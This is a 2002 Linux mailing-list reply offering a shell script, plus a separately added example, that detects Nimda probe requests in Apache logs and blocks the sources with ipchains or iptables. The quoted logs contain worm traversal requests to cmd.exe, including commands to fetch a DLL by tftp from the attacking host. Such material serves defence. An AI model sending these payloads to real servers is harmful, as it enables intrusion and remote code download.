Try the script below, which should take care of the problem.  Of course,
this isn't a DoS attack, it's a virus attack (one of the viruses going
around attempting to infect an IIS server).

Which kernel are you using?  If it's 2.4.x, iptables is the way to block
things out.  (in that case let me know, and I'll adapt this to deal with
iptables).

Michael

-- Begin Script --

#!/bin/sh
#
# Block sites which originate Nimda queries from Apache server
# Apache must be configured with HostnameLookups Off
# Adapted from an earlier script found on one of the Mandrake lists
# Changes by Michael Viron
# Last Update: 2/20/2002
LOGS=/var/log/httpd
# Change IP to reflect yours.  No spaces around "=": with spaces sh tries
# to run a command called DESTINATION instead of setting the variable.
DESTINATION=192.168.1.1
BLOCKED=/var/tmp/blocked
ADD=/etc/ipchains.add

cd $LOGS || exit 1
touch $BLOCKED

# One pass over the logs for every request string the worms leave behind
# (the same pipeline used to be repeated once per pattern).  -H makes grep
# print the file name even when the directory holds a single log, so the
# sub() in awk always has a "file:" prefix to strip before taking $1.
grep -H '^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]* ' * 2>/dev/null |
awk '/system32\/cmd\.exe|scripts\/Admin\.dll|MSADC\/Admin\.dll|scripts\/root\.exe|default\.ida/ {sub(/[^:]*:/,"");print $1}' |
sort -u |
while read host
do
    # -x matches whole lines, so 10.0.0.1 is not skipped just because
    # 10.0.0.10 is already in the list.
    if ! fgrep -x $host $BLOCKED >/dev/null
    then
        echo $host >>$BLOCKED
        /sbin/ipchains -I input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY
        echo "-A input -p tcp -s $host/32 -d $DESTINATION 80 -j DENY" >>$ADD
    fi
done

# Make the new rules permanent and reload them (nothing to do if no new
# hosts were found on this run).
if [ -f $ADD ]
then
    cat $ADD >> /etc/sysconfig/ipchains
    /etc/rc.d/init.d/ipchains restart
    rm -f $ADD
fi

-- End Script --
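The detection half of the script above, as an added example that is neither Michael's script nor part of the original post: it runs the same request-string patterns over a constructed sample log instead of /var/log/httpd, and prints the iptables rule that corresponds to the ipchains line (the 2.4.x kernel case mentioned above) instead of loading it. probe_hosts, block_rule and SAMPLE_LOG are names chosen here.

```shell
#!/bin/sh
# Added example, not the list script.  probe_hosts, block_rule and
# SAMPLE_LOG are names chosen here; the log content is constructed.

# Request substrings the script above treats as worm probes.  Written with
# [.] rather than \. so the value survives awk -v escape processing.
PROBE_RE='system32/cmd[.]exe|scripts/Admin[.]dll|MSADC/Admin[.]dll|scripts/root[.]exe|default[.]ida'

# Print each distinct client address whose request matches PROBE_RE.
# $1 = access log in Apache common/combined format with HostnameLookups
# Off, so field 1 is a dotted-quad address and not a host name.
probe_hosts() {
    awk -v re="$PROBE_RE" \
        '$1 ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/ && $0 ~ re { print $1 }' \
        "$1" | sort -u
}

# Print the iptables (kernel 2.4.x) rule equivalent to the ipchains line in
# the script: drop TCP from $1 to port 80 on $2.  Printed rather than run,
# so the rules can be reviewed before they are loaded.
block_rule() {
    printf 'iptables -I INPUT -p tcp -s %s/32 -d %s --dport 80 -j DROP\n' "$1" "$2"
}

# Constructed sample log: one client probing twice, one ordinary visitor,
# one Code Red style default.ida hit.
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat >"$SAMPLE_LOG" <<'EOF'
203.0.113.7 - - [28/Jul/2002:17:50:05 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
198.51.100.9 - - [28/Jul/2002:17:50:06 -0500] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"
203.0.113.7 - - [28/Jul/2002:18:01:34 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 87 "-" "-"
192.0.2.44 - - [28/Jul/2002:18:02:10 -0500] "GET /default.ida?XXXX HTTP/1.0" 404 300 "-" "-"
EOF

# Dry run: list the offenders and the rules that would be loaded for them.
probe_hosts "$SAMPLE_LOG" | while read host
do
    block_rule "$host" 192.168.1.1
done
```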



At 05:29 PM 7/28/2002 -0700, you wrote:
>I am getting strange hits to my web server,
>I don't like it and I wish to know how
>to stop them from slipping past my defenses.
>
>I try using ipchains, most addresses are
>blocked, but for reasons I can't figure out,
>this address 65.192.23.150 keeps showing up.
>
>I don't understand it, if ipchains,
>/etc/hosts.deny can't block it, what can?
>
>Do I send back a command to shut down
>their server?
>
>How do I get the point across?
>
>65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:05 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:06 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:07 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:17:50:08 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 87 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:34 -0500] "GET /scripts/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 87 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET /scripts/httpodbc.dll HTTP/1.0" 404 307 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 87 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET /MSADC/root.exe?/c+tftp%20-i%2065.192.23.150%20GET%20cool.dll%20httpodbc.dll HTTP/1.0" 200 87 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:35 -0500] "GET /MSADC/httpodbc.dll HTTP/1.0" 404 305 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:36 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:37 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:38 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:39 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 308 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"
>65.192.23.150 - - [28/Jul/2002:18:01:40 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325 "-" "-"

Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com
